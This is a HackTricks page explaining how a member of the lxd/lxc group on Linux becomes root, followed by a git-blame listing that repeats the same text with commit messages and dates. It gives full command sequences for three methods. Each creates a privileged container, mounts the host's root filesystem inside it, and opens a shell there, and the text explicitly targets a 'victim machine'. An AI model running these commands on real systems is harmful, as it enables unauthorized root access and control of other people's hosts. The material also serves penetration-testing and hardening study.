hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md

# lxd/lxc Group - Privilege escalation

<details>

<summary><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦 </strong></a><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️ </strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root

## Exploiting without internet

### Method 1

You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github):

```bash
sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
```

Then, upload to the vulnerable server the files **lxd.tar.xz** and **rootfs.squashfs**

Add the image:

```bash
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
```

Create a container and add root path

```bash
lxc init alpine privesc -c security.privileged=true --alias=alpine
lxc list #List containers

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```

{% hint style="danger" %}
If you find this error _**Error: No storage pool found. Please create a new storage pool**_\
Run **`lxd init`** and **repeat** the previous chunk of commands
{% endhint %}

Execute the container:

```bash
lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```

### Method 2

Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.

```bash
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.

# before running the image, start and configure the lxd storage pool as default 
lxd init

# run the image
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```

Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)

## With internet

You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).

```bash
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```

## Other Refs

{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}

<details>

<summary><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦 </strong></a><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️ </strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`# lxd/lxc Group - Privilege escalation`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`<details>`

twit 2023-03-05 20:58:55 +01:00			`<summary><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦 </strong></a><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️ </strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`</details>`

GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`If you belong to _lxd_ or _lxc_ group, you can become root`

GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`## Exploiting without internet`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`### Method 1`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github):`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
			```bash
GitBook: [master] one page modified 2021-08-22 04:17:22 +02:00			`sudo su`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`#Install requirements`
			`sudo apt update`
Update lxd-privilege-escalation.md to use git instead of go As of Go 1.17 the installation of binaries using `go get` is now deprecated. This commit updates the snippet to use another method of fetching the lxc repository. 2022-05-20 22:11:54 +02:00			`sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`#Clone repo`
ads missing https:// to git clone command 2022-06-12 22:41:36 +02:00			`git clone https://github.com/lxc/distrobuilder`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`#Make distrobuilder`
Update lxd-privilege-escalation.md 2022-05-20 22:08:30 +02:00			`cd distrobuilder`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`make`
			`#Prepare the creation of alpine`
			`mkdir -p $HOME/ContainerImages/alpine/`
			`cd $HOME/ContainerImages/alpine/`
			`wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml`
			`#Create the container`
GitBook: [master] one page modified 2021-08-22 04:17:22 +02:00			`sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			```

			`Then, upload to the vulnerable server the files lxd.tar.xz and rootfs.squashfs`

			`Add the image:`

			```bash
			`lxc image import lxd.tar.xz rootfs.squashfs --alias alpine`
			`lxc image list #You can see your new imported image`
			```

			`Create a container and add root path`

			```bash
Update lxd-privilege-escalation.md 2022-05-20 22:08:30 +02:00			`lxc init alpine privesc -c security.privileged=true --alias=alpine`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`lxc list #List containers`

			`lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true`
			```

GitBook: [master] one page modified 2021-08-22 04:17:22 +02:00			`{% hint style="danger" %}`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`If you find this error _Error: No storage pool found. Please create a new storage pool_\`
GitBook: [#3073] No subject 2022-03-25 16:00:31 +01:00			Run `lxd init` and repeat the previous chunk of commands
GitBook: [master] one page modified 2021-08-22 04:17:22 +02:00			`{% endhint %}`

GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`Execute the container:`

			```bash
			`lxc start privesc`
			`lxc exec privesc /bin/sh`
			`[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted`
			```

GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`### Method 2`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
			Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.

			```bash
			`# build a simple alpine image`
			`git clone https://github.com/saghul/lxd-alpine-builder`
GitBook: [master] one page modified 2021-04-11 11:10:57 +02:00			`cd lxd-alpine-builder`
			`sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine`
			`sudo ./build-alpine -a i686`
add help with mirror error 2020-10-30 03:21:51 +01:00
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00			`# import the image`
GitBook: [master] one page modified 2021-04-11 11:10:57 +02:00			`lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.`
Update lxd-privilege-escalation.md 2020-11-17 22:38:49 +01:00
			`# before running the image, start and configure the lxd storage pool as default`
			`lxd init`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
			`# run the image`
			`lxc init myimage mycontainer -c security.privileged=true`

			`# mount the /root into the image`
			`lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true`

			`# interact with the container`
			`lxc start mycontainer`
			`lxc exec mycontainer /bin/sh`
			```

GitBook: [#2876] save 2021-11-30 17:46:07 +01:00			`Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`## With internet`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
			`You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).`

			```bash
			`lxc init ubuntu:16.04 test -c security.privileged=true`
			`lxc config device add test whatever disk source=/ path=/mnt/root recursive=true`
			`lxc start test`
			`lxc exec test bash`
			`[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted`
			```

GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`## Other Refs`
GitBook: [master] 362 pages modified 2020-08-20 13:59:57 +02:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 13:21:18 +02:00			`{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`<details>`

twit 2023-03-05 20:58:55 +01:00			`<summary><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦 </strong></a><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️ </strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3765] No subject 2023-01-24 15:43:15 +01:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`</details>`